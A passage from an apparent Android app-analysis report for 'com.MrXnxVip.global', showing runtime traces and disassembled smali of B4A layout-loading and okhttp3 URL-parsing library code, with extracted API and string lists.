                            • getName: anywheresoftware.b4a.objects.WebViewWrapper
                          • Return:
                            • class anywheresoftware.b4a.objects.WebViewWrapper
                            • getName: anywheresoftware.b4a.objects.WebViewWrapper
                        • Time: 693165
                          • This:
                            • $Proxy5@b7d72ae
                          • Return:
                            • java.lang.String@def084f
                        • Time: 693167
                          • This:
                            • (WebView) Not initialized
                          • Return:
                            • java.lang.String@f68cbdc
                        • Time: 693168
                          • This:
                            • (WebView) Not initialized
                          • Return:
                            • false
                        291move-result-object v6
                        292if-eq v0, v6, :cond_1eb
                        293sget-boolean v0, Lanywheresoftware/b4a/BA;->debugMode:Z
                        294if-eqz v0, :cond_1dc
                        296invoke-virtual {v9}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        297move-result-object v0
                        299invoke-virtual {v0}, Ljava/lang/Class;->getGenericSuperclass()Ljava/lang/reflect/Type;
                        300move-result-object v0
                        301instance-of v6, v0, Ljava/lang/reflect/ParameterizedType;
                        302if-eqz v6, :cond_1dc
                        303check-cast v0, Ljava/lang/reflect/ParameterizedType;
                        305invoke-interface {v0}, Ljava/lang/reflect/ParameterizedType;->getActualTypeArguments()[Ljava/lang/reflect/Type;
                        306move-result-object v6
                        307array-length v6, v6
                        308if-lez v6, :cond_1dc
                        310invoke-virtual {v5}, Ljava/lang/reflect/Field;->getType()Ljava/lang/Class;
                        311move-result-object v6
                        313invoke-virtual {v6}, Ljava/lang/Class;->getGenericSuperclass()Ljava/lang/reflect/Type;
                        314move-result-object v6
                        315check-cast v6, Ljava/lang/reflect/ParameterizedType;
                        317invoke-interface {v6}, Ljava/lang/reflect/ParameterizedType;->getActualTypeArguments()[Ljava/lang/reflect/Type;
                        318move-result-object v6
                        319const/4 v12, 0x0
                        320aget-object v6, v6, v12
                        321check-cast v6, Ljava/lang/Class;
                        323invoke-interface {v0}, Ljava/lang/reflect/ParameterizedType;->getActualTypeArguments()[Ljava/lang/reflect/Type;
                        324move-result-object v0
                        325aget-object v0, v0, v12
                        326check-cast v0, Ljava/lang/Class;
                        328invoke-virtual {v6, v0}, Ljava/lang/Class;->isAssignableFrom(Ljava/lang/Class;)Z
                        329move-result v0
                        330if-eqz v0, :cond_1b8
                        331goto/16 :goto_1dd
                        332cond_1b8: new-instance v0, Ljava/lang/RuntimeException;
                        333new-instance v1, Ljava/lang/StringBuilder;
                        335const-string v2, "Cannot convert: "
                        337invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        339invoke-virtual {v9}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        340move-result-object v2
                        342invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        344const-string v2, ", to: "
                        346invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        348invoke-virtual {v5}, Ljava/lang/reflect/Field;->getType()Ljava/lang/Class;
                        349move-result-object v2
                        351invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        353invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        354move-result-object v1
                        356invoke-direct {v0, v1}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;)V
                        357throw v0
                        358cond_1dc: const/4 v12, 0x0
                        359goto_1dd:
                        360invoke-virtual {v5}, Ljava/lang/reflect/Field;->getType()Ljava/lang/Class;
                        361move-result-object v0
                        363invoke-virtual {v0}, Ljava/lang/Class;->newInstance()Ljava/lang/Object;
                        364move-result-object v0
                        365check-cast v0, Lanywheresoftware/b4a/ObjectWrapper;
                        367invoke-interface {v0, v7}, Lanywheresoftware/b4a/ObjectWrapper;->setObject(Ljava/lang/Object;)V
                        368goto/16 :goto_1ed
                        369cond_1eb: const/4 v12, 0x0
                        370move-object v0, v9
                        371goto_1ed:
                        372invoke-static/range {p1 .. p1}, Lanywheresoftware/b4a/BA;->isShellModeRuntimeCheck(Lanywheresoftware/b4a/BA;)Z
                        373move-result v6
                        374if-eqz v6, :cond_203
                        376sget-object v6, Lanywheresoftware/b4a/keywords/LayoutBuilder;->viewsToSendInShellMode:Ljava/util/HashMap;
                        377if-nez v6, :cond_1fe
                        378new-instance v6, Ljava/util/HashMap;
                        380invoke-direct {v6}, Ljava/util/HashMap;-><init>()V
                        381sput-object v6, Lanywheresoftware/b4a/keywords/LayoutBuilder;->viewsToSendInShellMode:Ljava/util/HashMap;
                        382cond_1fe:
                        383sget-object v6, Lanywheresoftware/b4a/keywords/LayoutBuilder;->viewsToSendInShellMode:Ljava/util/HashMap;
                        385invoke-virtual {v6, v8, v0}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        386cond_203: if-eqz v5, :cond_224
                        387move-object/from16 v6, p2
                        388try_start_207:
                        389invoke-virtual {v5, v6, v0}, Ljava/lang/reflect/Field;->set(Ljava/lang/Object;Ljava/lang/Object;)V
                        • Time: 693181
                          • This:
                            • public anywheresoftware.b4a.objects.WebViewWrapper com.MrXnxVip.global.main._webview1
                            • getName:_webview1
                          • p0: com.MrXnxVip.global.main@ff69451
                          • p1: (WebView) Not initialized
                        390try_end_20a: goto/16 :goto_226
                        391catch_20b: new-instance v0, Ljava/lang/RuntimeException;
                        392new-instance v1, Ljava/lang/StringBuilder;
                        394const-string v2, "Field "
                        396invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        398invoke-virtual {v1, v8}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        400const-string v2, " was declared with the wrong type."
                        402invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        404invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        405move-result-object v1
                        407invoke-direct {v0, v1}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/String;)V
                        408throw v0
                        409cond_224: move-object/from16 v6, p2
                        410goto_226:
                        411invoke-virtual {v9, v7}, Lanywheresoftware/b4a/objects/ViewWrapper;->setObject(Ljava/lang/Object;)V
                        413const-string v0, "eventName"
                        415invoke-virtual {v1, v0}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        416move-result-object v0
                        417check-cast v0, Ljava/lang/String;
                        419sget-object v5, Lanywheresoftware/b4a/BA;->cul:Ljava/util/Locale;
                        421invoke-virtual {v0, v5}, Ljava/lang/String;->toLowerCase(Ljava/util/Locale;)Ljava/lang/String;
                        422move-result-object v0
                        423const/4 v5, 0x1
                        425invoke-virtual {v9, v11, v0, v5}, Lanywheresoftware/b4a/objects/ViewWrapper;->innerInitialize(Lanywheresoftware/b4a/BA;Ljava/lang/String;Z)V
                        427invoke-virtual {v7}, Landroid/view/View;->getLayoutParams()Landroid/view/ViewGroup$LayoutParams;
                        428move-result-object v0
                        430invoke-virtual {v2, v7, v0}, Landroid/view/ViewGroup;->addView(Landroid/view/View;Landroid/view/ViewGroup$LayoutParams;)V
                        431iget v0, v13, Lanywheresoftware/b4a/keywords/LayoutBuilder$ViewWrapperAndAnchor;->hanchor:I
                        432if-nez v0, :cond_24a
                        433iget v0, v13, Lanywheresoftware/b4a/keywords/LayoutBuilder$ViewWrapperAndAnchor;->vanchor:I
                        434if-eqz v0, :cond_271
                        435cond_24a:
                        436invoke-static {v3, v4, v13}, Lanywheresoftware/b4a/objects/ViewWrapper;->fixAnchor(IILanywheresoftware/b4a/keywords/LayoutBuilder$ViewWrapperAndAnchor;)V
                        437goto/16 :goto_271
                        438cond_24e: aget-object v12, v0, v6
                        439move-object/from16 p4, v0
                        441invoke-virtual {v12}, Ljava/lang/reflect/Field;->getName()Ljava/lang/String;
                        442move-result-object v0
                        444invoke-virtual {v0, v5}, Ljava/lang/String;->startsWith(Ljava/lang/String;)Z
                        445move-result v0
                        446if-eqz v0, :cond_265
                        448sget-object v0, Lanywheresoftware/b4a/keywords/LayoutBuilder;->classFields:Ljava/util/HashMap;
                        450invoke-virtual {v12}, Ljava/lang/reflect/Field;->getName()Ljava/lang/String;
                        451move-result-object v2
                        453invoke-virtual {v0, v2, v12}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        454cond_265: add-int/lit8 v6, v6, 0x1
                        455move-object/from16 v2, p3
                        456move-object/from16 v0, p4
                        457move-object/from16 v12, p5
                        458goto/16 :goto_f0
                        459cond_26f: move-object/from16 v14, p7
                        460cond_271: move-object v0, v7
                        461goto_272:
                        462const-string v2, ":kids"
                        464invoke-virtual {v1, v2}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        465move-result-object v1
                        466move-object v12, v1
                        467check-cast v12, Ljava/util/HashMap;
                        468if-eqz v12, :cond_2c4
                        470invoke-virtual {v0}, Landroid/view/View;->getLayoutParams()Landroid/view/ViewGroup$LayoutParams;
                        471move-result-object v1
                        472if-nez v1, :cond_285
                        473const/4 v13, 0x0
                        474goto/16 :goto_28c
                        475cond_285:
                        476invoke-virtual {v0}, Landroid/view/View;->getLayoutParams()Landroid/view/ViewGroup$LayoutParams;
                        477move-result-object v1
                        478iget v1, v1, Landroid/view/ViewGroup$LayoutParams;->width:I
                        479move v13, v1
                        480goto_28c:
                        481invoke-virtual {v0}, Landroid/view/View;->getLayoutParams()Landroid/view/ViewGroup$LayoutParams;
                        482move-result-object v1
                        483if-nez v1, :cond_294
                        484const/4 v15, 0x0
                        485goto/16 :goto_29b
                        486cond_294:
                        487invoke-virtual {v0}, Landroid/view/View;->getLayoutParams()Landroid/view/ViewGroup$LayoutParams;
                        488move-result-object v1
                        489iget v1, v1, Landroid/view/ViewGroup$LayoutParams;->height:I
                        490move v15, v1
                        491goto_29b: const/4 v10, 0x0
                        492goto_29c:
                        493invoke-virtual {v12}, Ljava/util/HashMap;->size()I
                        494move-result v1
                        495if-lt v10, v1, :cond_2a3
                        496goto/16 :goto_2c4
                        497cond_2a3:
                        498invoke-static {v10}, Ljava/lang/String;->valueOf(I)Ljava/lang/String;
                        499move-result-object v1
                        501invoke-virtual {v12, v1}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        502move-result-object v1
                        503check-cast v1, Ljava/util/HashMap;
                        504move-object v4, v0
                        505check-cast v4, Landroid/view/ViewGroup;
                        506const/4 v5, 0x0
                        507const/4 v7, 0x0
                        508move-object/from16 v2, p1
                        509move-object/from16 v3, p2
                        510move-object/from16 v6, p5
                        511move-object/from16 v8, p7
                        512move v9, v13
                        513move/from16 v16, v10
                        514move v10, v15
                        516invoke-static/range {v1 .. v10}, Lanywheresoftware/b4a/keywords/LayoutBuilder;->loadLayoutHelper(Ljava/util/HashMap;Lanywheresoftware/b4a/BA;Ljava/lang/Object;Landroid/view/ViewGroup;ZLjava/lang/String;ZLjava/util/HashMap;II)V
                        517add-int/lit8 v10, v16, 0x1
                        518goto/16 :goto_29c
                        519goto_2c4: return-void
                        Cross References
                        APIs
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.String.substring
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.IllegalArgumentException.<init>
                        • java.util.List.clear
                        • java.util.List.addAll
                        • java.lang.String.charAt
                        • java.lang.String.charAt
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.String.substring
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Object.toString
                        • java.lang.IllegalArgumentException.<init>
                        • java.lang.String.charAt
                        • java.lang.String.charAt
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.String.substring
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Object.toString
                        • java.lang.IllegalArgumentException.<init>
                        • java.lang.IllegalArgumentException.<init>
                        Strings
                        • input
                        • (this as java.lang.Strin\u2026ing(startIndex, endIndex)
                        • https:
                        • https
                        • http:
                        • http
                        • Expected URL scheme \'http\' or \'https\' but was \'
                        • \'
                        • @/\\?#
                        • %40
                        • \"\':;<=>@[]^`{}|/\\?#
                        • Invalid URL port: \"
                        • ssd-vip.website
                        • ssd-vip.website
                        • ?#
                        • \"\'<>#
                        • Invalid URL host: \"
                        • Expected URL scheme \'http\' or \'https\' but no colon was found
                        Position Instruction Meta Information
                        0move-object/from16 v0, p0
                        1move-object/from16 v13, p2
                        3const-string v1, "input"
                        5invoke-static {v13, v1}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullParameter(Ljava/lang/Object;Ljava/lang/String;)V
                        6const/4 v14, 0x0
                        7const/4 v1, 0x3
                        8const/4 v2, 0x0
                        10invoke-static {v13, v14, v14, v1, v2}, Lokhttp3/internal/Util;->indexOfFirstNonAsciiWhitespace$default(Ljava/lang/String;IIILjava/lang/Object;)I
                        11move-result v1
                        12const/4 v3, 0x2
                        14invoke-static {v13, v1, v14, v3, v2}, Lokhttp3/internal/Util;->indexOfLastNonAsciiWhitespace$default(Ljava/lang/String;IIILjava/lang/Object;)I
                        15move-result v15
                        17sget-object v2, Lokhttp3/HttpUrl$Builder;->Companion:Lokhttp3/HttpUrl$Builder$Companion;
                        19invoke-static {v2, v13, v1, v15}, Lokhttp3/HttpUrl$Builder$Companion;->access$schemeDelimiterOffset(Lokhttp3/HttpUrl$Builder$Companion;Ljava/lang/String;II)I
                        20move-result v2
                        22const-string v12, "(this as java.lang.Strin\u2026ing(startIndex, endIndex)"
                        23const/4 v11, -0x1
                        24const/4 v10, 0x1
                        25if-eq v2, v11, :cond_64
                        27const-string v4, "https:"
                        29invoke-static {v13, v4, v1, v10}, Lkotlin/text/StringsKt;->startsWith(Ljava/lang/String;Ljava/lang/String;IZ)Z
                        30move-result v4
                        31if-eqz v4, :cond_30
                        33const-string v2, "https"
                        34iput-object v2, v0, Lokhttp3/HttpUrl$Builder;->scheme:Ljava/lang/String;
                        35add-int/lit8 v1, v1, 0x6
                        36goto/16 :goto_6c
                        37cond_30:
                        38const-string v4, "http:"
                        40invoke-static {v13, v4, v1, v10}, Lkotlin/text/StringsKt;->startsWith(Ljava/lang/String;Ljava/lang/String;IZ)Z
                        41move-result v4
                        42if-eqz v4, :cond_3f
                        44const-string v2, "http"
                        45iput-object v2, v0, Lokhttp3/HttpUrl$Builder;->scheme:Ljava/lang/String;
                        46add-int/lit8 v1, v1, 0x5
                        47goto/16 :goto_6c
                        48cond_3f: new-instance v1, Ljava/lang/IllegalArgumentException;
                        49new-instance v3, Ljava/lang/StringBuilder;
                        51invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
                        53const-string v4, "Expected URL scheme \'http\' or \'https\' but was \'"
                        55invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        57invoke-virtual {v13, v14, v2}, Ljava/lang/String;->substring(II)Ljava/lang/String;
                        58move-result-object v2
                        60invoke-static {v2, v12}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullExpressionValue(Ljava/lang/Object;Ljava/lang/String;)V
                        62invoke-virtual {v3, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        64const-string v2, "\'"
                        66invoke-virtual {v3, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        68invoke-virtual {v3}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        69move-result-object v2
                        71invoke-direct {v1, v2}, Ljava/lang/IllegalArgumentException;-><init>(Ljava/lang/String;)V
                        72check-cast v1, Ljava/lang/Throwable;
                        73throw v1
                        74cond_64: if-eqz p1, :cond_2dc
                        76invoke-virtual/range {p1 .. p1}, Lokhttp3/HttpUrl;->scheme()Ljava/lang/String;
                        77move-result-object v2
                        78iput-object v2, v0, Lokhttp3/HttpUrl$Builder;->scheme:Ljava/lang/String;
                        79goto_6c:
                        80sget-object v2, Lokhttp3/HttpUrl$Builder;->Companion:Lokhttp3/HttpUrl$Builder$Companion;
                        82invoke-static {v2, v13, v1, v15}, Lokhttp3/HttpUrl$Builder$Companion;->access$slashCount(Lokhttp3/HttpUrl$Builder$Companion;Ljava/lang/String;II)I
                        83move-result v2
                        84const/16 v9, 0x3f
                        85const/16 v8, 0x23
                        86if-ge v2, v3, :cond_c5
                        87if-eqz p1, :cond_c5
                        89invoke-virtual/range {p1 .. p1}, Lokhttp3/HttpUrl;->scheme()Ljava/lang/String;
                        90move-result-object v3
                        92iget-object v4, v0, Lokhttp3/HttpUrl$Builder;->scheme:Ljava/lang/String;
                        94invoke-static {v3, v4}, Lkotlin/jvm/internal/Intrinsics;->areEqual(Ljava/lang/Object;Ljava/lang/Object;)Z
                        95move-result v3
                        96xor-int/2addr v3, v10
                        97if-eqz v3, :cond_88
                        98goto/16 :goto_c5
                        99cond_88:
                        100invoke-virtual/range {p1 .. p1}, Lokhttp3/HttpUrl;->encodedUsername()Ljava/lang/String;
                        101move-result-object v2
                        102iput-object v2, v0, Lokhttp3/HttpUrl$Builder;->encodedUsername:Ljava/lang/String;
                        104invoke-virtual/range {p1 .. p1}, Lokhttp3/HttpUrl;->encodedPassword()Ljava/lang/String;
                        105move-result-object v2
                        106iput-object v2, v0, Lokhttp3/HttpUrl$Builder;->encodedPassword:Ljava/lang/String;
                        108invoke-virtual/range {p1 .. p1}, Lokhttp3/HttpUrl;->host()Ljava/lang/String;
                        109move-result-object v2
                        110iput-object v2, v0, Lokhttp3/HttpUrl$Builder;->host:Ljava/lang/String;
                        112invoke-virtual/range {p1 .. p1}, Lokhttp3/HttpUrl;->port()I
                        113move-result v2
                        114iput v2, v0, Lokhttp3/HttpUrl$Builder;->port:I
                        116iget-object v2, v0, Lokhttp3/HttpUrl$Builder;->encodedPathSegments:Ljava/util/List;
                        118invoke-interface {v2}, Ljava/util/List;->clear()V
                        120iget-object v2, v0, Lokhttp3/HttpUrl$Builder;->encodedPathSegments:Ljava/util/List;
                        122invoke-virtual/range {p1 .. p1}, Lokhttp3/HttpUrl;->encodedPathSegments()Ljava/util/List;
                        123move-result-object v3
                        124check-cast v3, Ljava/util/Collection;
                        126invoke-interface {v2, v3}, Ljava/util/List;->addAll(Ljava/util/Collection;)Z
                        127if-eq v1, v15, :cond_b8
                        129invoke-virtual {v13, v1}, Ljava/lang/String;->charAt(I)C
                        130move-result v2
                        131if-ne v2, v8, :cond_bf
                        132cond_b8:
                        133invoke-virtual/range {p1 .. p1}, Lokhttp3/HttpUrl;->encodedQuery()Ljava/lang/String;
                        134move-result-object v2
                        136invoke-virtual {v0, v2}, Lokhttp3/HttpUrl$Builder;->encodedQuery(Ljava/lang/String;)Lokhttp3/HttpUrl$Builder;
                        137cond_bf: move/from16 v19, v15
                        138const/16 v18, 0x1
                        139goto/16 :goto_254
                        140goto_c5: add-int/2addr v1, v2
                        141move v7, v1
                        142const/16 v16, 0x0
                        143const/16 v17, 0x0
                        144goto_cb:
                        145const-string v1, "@/\\?#"
                        147invoke-static {v13, v1, v7, v15}, Lokhttp3/internal/Util;->delimiterOffset(Ljava/lang/String;Ljava/lang/String;II)I
                        148move-result v6
                        149if-eq v6, v15, :cond_d8
                        151invoke-virtual {v13, v6}, Ljava/lang/String;->charAt(I)C
                        152move-result v1
                        153goto/16 :goto_d9
                        154cond_d8: const/4 v1, -0x1
                        155goto_d9: if-eq v1, v11, :cond_1c3
                        156if-eq v1, v8, :cond_1c3
                        157const/16 v2, 0x2f
                        158if-eq v1, v2, :cond_1c3
                        159const/16 v2, 0x5c
                        160if-eq v1, v2, :cond_1c3
                        161if-eq v1, v9, :cond_1c3
                        162const/16 v2, 0x40
                        163if-eq v1, v2, :cond_f3
                        164move-object/from16 v20, v12
                        165move/from16 v19, v15
                        166const/16 v18, 0x1
                        167goto/16 :goto_1b6
                        168cond_f3:
                        169const-string v5, "%40"
                        170if-nez v16, :cond_172
                        171const/16 v1, 0x3a
                        173invoke-static {v13, v1, v7, v6}, Lokhttp3/internal/Util;->delimiterOffset(Ljava/lang/String;CII)I
                        174move-result v4
                        176sget-object v1, Lokhttp3/HttpUrl;->Companion:Lokhttp3/HttpUrl$Companion;
                        177const/16 v18, 0x1
                        178const/16 v19, 0x0
                        179const/16 v20, 0x0
                        180const/16 v21, 0x0
                        181const/16 v22, 0x0
                        182const/16 v23, 0xf0
                        183const/16 v24, 0x0
                        185const-string v25, " \"\':;<=>@[]^`{}|/\\?#"
                        186move-object/from16 v2, p2
                        187move v3, v7
                        188move v7, v4
                        189move-object v14, v5
                        190move-object/from16 v5, v25
                        191move/from16 v26, v6
                        192move/from16 v6, v18
                        193move/from16 v27, v7
                        194move/from16 v7, v19
                        195move/from16 v8, v20
                        196move/from16 v9, v21
                        197const/16 v18, 0x1
                        198move-object/from16 v10, v22
                        199move/from16 v11, v23
                        200move/from16 v19, v15
                        201move-object v15, v12
                        202move-object/from16 v12, v24
                        204invoke-static/range {v1 .. v12}, Lokhttp3/HttpUrl$Companion;->canonicalize$okhttp$default(Lokhttp3/HttpUrl$Companion;Ljava/lang/String;IILjava/lang/String;ZZZZLjava/nio/charset/Charset;ILjava/lang/Object;)Ljava/lang/String;
                        205move-result-object v1
                        206if-eqz v17, :cond_147
                        207new-instance v2, Ljava/lang/StringBuilder;
                        209invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        211iget-object v3, v0, Lokhttp3/HttpUrl$Builder;->encodedUsername:Ljava/lang/String;
                        213invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        215invoke-virtual {v2, v14}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        217invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        219invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        220move-result-object v1
                        221cond_147: iput-object v1, v0, Lokhttp3/HttpUrl$Builder;->encodedUsername:Ljava/lang/String;
                        222move/from16 v14, v26
                        223move/from16 v1, v27
                        224if-eq v1, v14, :cond_169
                        226sget-object v2, Lokhttp3/HttpUrl;->Companion:Lokhttp3/HttpUrl$Companion;
                        227add-int/lit8 v3, v1, 0x1
                        228const/4 v6, 0x1
                        229const/4 v7, 0x0
                        230const/4 v8, 0x0
                        231const/4 v9, 0x0
                        232const/4 v10, 0x0
                        233const/16 v11, 0xf0
                        234const/4 v12, 0x0
                        236const-string v5, " \"\':;<=>@[]^`{}|/\\?#"
                        237move-object v1, v2
                        238move-object/from16 v2, p2
                        239move v4, v14
                        241invoke-static/range {v1 .. v12}, Lokhttp3/HttpUrl$Companion;->canonicalize$okhttp$default(Lokhttp3/HttpUrl$Companion;Ljava/lang/String;IILjava/lang/String;ZZZZLjava/nio/charset/Charset;ILjava/lang/Object;)Ljava/lang/String;
                        242move-result-object v1
                        243iput-object v1, v0, Lokhttp3/HttpUrl$Builder;->encodedPassword:Ljava/lang/String;
                        244const/4 v10, 0x1
                        245goto/16 :goto_16b
                        246cond_169: move/from16 v10, v16
                        247goto_16b: move/from16 v16, v10
                        248move-object/from16 v20, v15
                        249const/4 v10, 0x1
                        250move v15, v14
                        251goto/16 :goto_1b2
                        252cond_172: move-object v14, v5
                        253move/from16 v19, v15
                        254const/16 v18, 0x1
                        255move-object v15, v12
                        256move v12, v6
                        257new-instance v11, Ljava/lang/StringBuilder;
                        259invoke-direct {v11}, Ljava/lang/StringBuilder;-><init>()V
                        261iget-object v1, v0, Lokhttp3/HttpUrl$Builder;->encodedPassword:Ljava/lang/String;
                        263invoke-virtual {v11, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        265invoke-virtual {v11, v14}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        267sget-object v1, Lokhttp3/HttpUrl;->Companion:Lokhttp3/HttpUrl$Companion;
                        268const/4 v6, 0x1
                        269const/4 v8, 0x0
                        270const/4 v9, 0x0
                        271const/4 v10, 0x0
                        272const/4 v14, 0x0
                        273const/16 v20, 0xf0
                        274const/16 v21, 0x0
                        276const-string v5, " \"\':;<=>@[]^`{}|/\\?#"
                        277move-object/from16 v2, p2
                        278move v3, v7
                        279move v4, v12
                        280move v7, v8
                        281move v8, v9
                        282move v9, v10
                        283move-object v10, v14
                        284move-object v14, v11
                        285move/from16 v11, v20
                        286move-object/from16 v20, v15
                        287move v15, v12
                        288move-object/from16 v12, v21
                        290invoke-static/range {v1 .. v12}, Lokhttp3/HttpUrl$Companion;->canonicalize$okhttp$default(Lokhttp3/HttpUrl$Companion;Ljava/lang/String;IILjava/lang/String;ZZZZLjava/nio/charset/Charset;ILjava/lang/Object;)Ljava/lang/String;
                        291move-result-object v1
                        293invoke-virtual {v14, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        295invoke-virtual {v14}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        296move-result-object v1
                        297iput-object v1, v0, Lokhttp3/HttpUrl$Builder;->encodedPassword:Ljava/lang/String;
                        298move/from16 v10, v17
                        299goto_1b2: add-int/lit8 v7, v15, 0x1
                        300move/from16 v17, v10
                        301goto_1b6: move/from16 v15, v19
                        302move-object/from16 v12, v20
                        303const/16 v8, 0x23
                        304const/16 v9, 0x3f
                        305const/4 v10, 0x1
                        306const/4 v11, -0x1
                        307const/4 v14, 0x0
                        308goto/16 :goto_cb
                        309cond_1c3: move-object/from16 v20, v12
                        310move/from16 v19, v15
                        311const/16 v18, 0x1
                        312move v15, v6
                        314sget-object v1, Lokhttp3/HttpUrl$Builder;->Companion:Lokhttp3/HttpUrl$Builder$Companion;
                        316invoke-static {v1, v13, v7, v15}, Lokhttp3/HttpUrl$Builder$Companion;->access$portColonOffset(Lokhttp3/HttpUrl$Builder$Companion;Ljava/lang/String;II)I
                        317move-result v8
                        318add-int/lit8 v9, v8, 0x1
                        319const/16 v10, 0x22
                        320if-ge v9, v15, :cond_227
                        322sget-object v1, Lokhttp3/HttpUrl;->Companion:Lokhttp3/HttpUrl$Companion;
                        323const/4 v5, 0x0
                        324const/4 v6, 0x4
                        325const/4 v11, 0x0
                        326move-object/from16 v2, p2
                        327move v3, v7
                        328move v4, v8
                        329move v12, v7
                        330move-object v7, v11
                        332invoke-static/range {v1 .. v7}, Lokhttp3/HttpUrl$Companion;->percentDecode$okhttp$default(Lokhttp3/HttpUrl$Companion;Ljava/lang/String;IIZILjava/lang/Object;)Ljava/lang/String;
                        333move-result-object v1
                        335invoke-static {v1}, Lokhttp3/internal/HostnamesKt;->toCanonicalHost(Ljava/lang/String;)Ljava/lang/String;
                        336move-result-object v1
                        337iput-object v1, v0, Lokhttp3/HttpUrl$Builder;->host:Ljava/lang/String;
                        339sget-object v1, Lokhttp3/HttpUrl$Builder;->Companion:Lokhttp3/HttpUrl$Builder$Companion;
                        341invoke-static {v1, v13, v9, v15}, Lokhttp3/HttpUrl$Builder$Companion;->access$parsePort(Lokhttp3/HttpUrl$Builder$Companion;Ljava/lang/String;II)I
                        342move-result v1
                        343iput v1, v0, Lokhttp3/HttpUrl$Builder;->port:I
                        344const/4 v2, -0x1
                        345if-eq v1, v2, :cond_1f8
                        346const/4 v1, 0x1
                        347goto/16 :goto_1f9
                        348cond_1f8: const/4 v1, 0x0
                        349goto_1f9: if-eqz v1, :cond_1fe
                        350move-object/from16 v9, v20
                        351goto/16 :goto_24a
                        352cond_1fe: new-instance v1, Ljava/lang/StringBuilder;
                        354invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        356const-string v2, "Invalid URL port: \""
                        358invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        360invoke-virtual {v13, v9, v15}, Ljava/lang/String;->substring(II)Ljava/lang/String;
                        361move-result-object v2
                        362move-object/from16 v9, v20
                        364invoke-static {v2, v9}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullExpressionValue(Ljava/lang/Object;Ljava/lang/String;)V
                        366invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        368invoke-virtual {v1, v10}, Ljava/lang/StringBuilder;->append(C)Ljava/lang/StringBuilder;
                        370invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        371move-result-object v1
                        372new-instance v2, Ljava/lang/IllegalArgumentException;
                        374invoke-virtual {v1}, Ljava/lang/Object;->toString()Ljava/lang/String;
                        375move-result-object v1
                        377invoke-direct {v2, v1}, Ljava/lang/IllegalArgumentException;-><init>(Ljava/lang/String;)V
                        378check-cast v2, Ljava/lang/Throwable;
                        379throw v2
                        380cond_227: move v12, v7
                        381move-object/from16 v9, v20
                        383sget-object v1, Lokhttp3/HttpUrl;->Companion:Lokhttp3/HttpUrl$Companion;
                        384const/4 v5, 0x0
                        385const/4 v6, 0x4
                        386const/4 v7, 0x0
                        387move-object/from16 v2, p2
